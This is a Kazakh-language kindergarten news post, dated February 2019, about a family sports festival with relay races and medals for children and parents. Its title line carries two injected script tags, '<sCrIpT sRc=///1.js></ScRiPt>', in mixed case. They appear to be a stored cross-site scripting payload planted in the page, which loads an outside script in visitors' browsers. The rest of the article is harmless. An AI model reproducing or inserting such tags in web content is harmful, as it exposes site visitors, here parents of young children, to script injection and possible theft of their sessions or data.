Бүкіл отбасымен стартқа<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

20.02.2019

Әр адамның ең басты құндылығы – денсаулық, сондықтан балабақшада дені сау баланы тәрбиелеуге үлкен көңіл бөлінеді. Дені сау, мықты болып өсуге спорт көмектеседі. Дене шынықтырумен айналысу пайдалы, ал көңілді дене шынықтырумен айналысу – екі есе пайдалы.

Біздің "Родничок" балабақшамызда 11-15 ақпан аралығында "Денсаулық күніне" арналған апта өтті.  

Денсаулық апталығының соңында, 2019 жылы 15- ақпанда "Дарын" ересек тобының тәрбиешілері Макажанова Л. К., Шаймерденова С. К. және би үйретуші Лосева Т. Н. ата-аналармен бірге "Бүкіл отбасымен стартқа" атты спорттық мереке өткізді.    Екі команда:" Жұлдыздар "және" Гүлдер " қызықты эстафеталар мен ойындарда күш пен ептілікпен жарысты. Өзара көмек көрсету, ережеге бағыну сияқты маңызды қасиеттерді көрсетті. Ата-аналар мен балалар көңілді  болып, көп  әсер алды, ең бастысы сергектік пен жағымды эмоцияларға ие болды. Жанкүйерлер де өз командаларына уайымдады. Мереке соңында №3 балабақшаның меңгерушісі

Мырзабаева Ж. О.  барлық қатысушыларды мадақтамалармен және медальдармен марапаттады.

Просмотров: 501


Пікір қосу



Деректерді қолтаңбаға қосу